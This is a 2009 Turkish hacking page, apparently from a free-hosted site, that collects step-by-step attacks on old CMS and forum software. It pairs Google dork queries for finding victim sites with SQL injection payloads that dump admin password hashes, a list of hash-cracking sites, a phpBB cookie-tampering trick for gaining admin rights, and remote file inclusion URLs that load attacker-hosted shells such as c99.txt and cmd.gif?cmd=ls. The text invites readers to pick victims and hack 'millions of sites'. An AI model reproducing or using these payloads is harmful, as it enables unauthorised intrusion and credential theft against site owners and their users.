!
  Hangi Site Nasıl Hacklenir?
 
MİNİ NUKE V2.3



Mini nuke sitelerle uğraşmak için ilk önce



wwww.Google.com a giriyoruz ve: ’mini-nuke v2.3’ olarak aratıyoruz.



Karşımıza gelen sitelerin sonuna



:/pages.asp?id=3%20union+select+ 0*kul_adi*sifre*0*0+ from+members+where+uye_id=1



Kodunu ekliyoruz ve karşımıza adminin md5 i çıkıyor.



MD5 i kırmak içinde



http://passcrack.spb.ru

http://gdataonline.com

http://us.md5.crysm.net

http://md5.rednoize.com

http://ice.breaker.free.fr

http://www.milw0rm.com/md5/

http://shm.hard-core.pl/md5/

http://www.hashchecker.com

http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/

http://md5.benramsey.com

http://md5.altervista.org

http://shm.hard-core.pl

http://plain-text.info

www.md5lookup.com

www.passcracking.ru

www.md5lookup.com

www.passcracking.ru/

http://www.securitystats.com/tools/hashcrack.php



CİGİCİGİ&GPLX

---------------------------------------------------------------------------



-VİRTUAL WAR V.1.0



ilk önce
www.google.com ’Powered by: Virtual War v1.5.0’



Sonu /war.php olan siteleri seçiyoruz ve



war.php kısmı siliyoruz ’includes/get_header.php?vwar_root=http: //www.tuningclub.ch/config.dat?’ kodunu ekliyoruz.



Artık admin palenelindeyiz



[Eski bir açık olduğu için sonuç alamayabilirsiniz]





---------------------------------------------------------------------------

---

-PHPBB 2.0.11



işte meşhur phpbb açığı



Bize gereken en önemli program :



http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]



Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken ’BENİ HATIRLA’ diyoruz ve siteye giriyoruz.



Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından



kurban phpbb 2.0.11 sitemizi seçicez.



Sitemizi bulduk 2 kez tıklıyoruz.



Önümüze a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bs%3A0%3A%2 2“%3Bs%3A6%3A“userid“%3B s%3A1%3A“2“%3B%7D Gibi Abudik



Kubidik Kodlar Gelicek Üssteki Kodu Slip



a%3A2%3A%7Bs%3A11%3A“autolog inid“%3Bb%3A1%3Bs% 3A6%3A“userid“%3Bs%3A1%3A% 222“%3B%7D Bu kodu yeryeştiriyoruz



Saveliyoruz.



Artık cooike editör ile işimiz bitti



Sitemizi yeniliyoruz bakıyoruz aaaa adminiz





---------------------------------------------------------------------------

-----

-PHP NUKE SQL INJECTİON



www.googLe.com a giriyoruz aranacak kelimeye



’PHP-Nuke Copyright © 2004 by Francisco Burzi’ yazıyoruz.



Bulduğumuz sitenin search bölümüne ’p0gg0nsee%’) UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*’ yazmamız kafi



Search bölümünü bulamadıysanız



www.hackleneceksite.com/modules.php?name=Search



Adminin hashı çıkıyor bunu kırıyoruz dökümanın en üstünde adresleri werdim.





---------------------------------------------------------------------------

------

-COM_REMOSİTORY



wWW.Google.com ’’inurl:"com_remository"



Bulduğumuz sitelere



http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php



Kodunu ekliyoruz...



---------------------------------------------------------------------------

-----------

-XOOPs MYADS MODULE SQL-INJECTİON VULNERABİLİT



WWW.Google.Com ’inurl:modules/myAds/’



Karşımıza çıkan siteleri şu şekilde değiştiriyoruz.



http://www.site.com/modules/myAds/an...rs+limit+1*1/*



Ve önümüze tekrar md5 ler çıkıyor bunları kırmak artık size kalmış...



---------------------------------------------------------------------------

-------------

-TOPLİST HACK PHPBB



GoogLe Arama : inurl:"toplist.php" "powered by phpbb"





Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls





---------------------------------------------------------------------------

--------------

- PC_COOKBOOK JOOMLA COMPONENT



- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities



- Author: JaheeMCreW



- Uygulama : pc_cookbook Component



- Version : koyans 0.3



Yapmaniz gereken bir arama moturunda örnek google’ da



" allinurl:com_pccookbook " olarak aratmaktir..



Exploit :



http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript





---------------------------------------------------------------------------

-------------

-SİMPLE BOARD MAMBO



İlk Önce WwwW.GoogLe.com



Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...



http://site.com/components/com_simpl...me%20-a;id;pwd





---------------------------------------------------------------------------

-------------

-ShoutBox IncLusion



shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...



Code:



/shoutbox/expanded.php?conf=





GoogLe Arama : inurl:"/shoutbox/expanded.php?"



---------------------------------------------------------------------------

--------------

-PHPBAZAR <= 2.1.0 Remote File INCLLUSION



Google Search=inurl:classified.php phpbazar



http://hedefsite.com/classified_righ...ell.txt?cmd=id





---------------------------------------------------------------------------

---------------

-BoastMachine [bmachine]



yeni gözde blog sistemi olan bmachine’in 2.8 versiyonunda bulunan ufak bi açık :



site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin



şifresini görüyoruz : )





---------------------------------------------------------------------------

----------------

-Limbo CMS <= 1.04 Remote File Inclusion



GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"





Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

---------------------------------------------------------------------------

-----------------

-CaLogic Calendars V1.2.2 - Remote File Include



GoogLe Arama : CaLogic Calendars V1.2.2



kullanmak için :



http://site.com/[path]/reconfig....1;evil_script]

http://site.com/[path]/srxclr.ph...1;evil_script]





---------------------------------------------------------------------------

------------------

-PafileDB Remote File Inclusion [phpBB]



PhpBB SiteLerde PafileDB ’deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..





http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= http://[attacker]





---------------------------------------------------------------------------

-------------------

-JetBox CMS Remote File Include [ RFI ]



Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..



Uretici Firma : http://jetbox.streamedge.com/



JetBox CMS Remote File Include



http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..



GoogLe arama : Powered by Jetbox



---------------------------------------------------------------------------

---------------------





Aratma Kodu : PHP Upload Center v2.0

Shell : activate.php?language=conf&footerpage=http://melll.by.ru/c99.txt?
 
 
  Bugün 42 ziyaretçi (45 klik) kişi burdaydı! Copyright © 2009 WWW.SANALZARARAR.TR.GG All Rights Reserved.  
 
Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol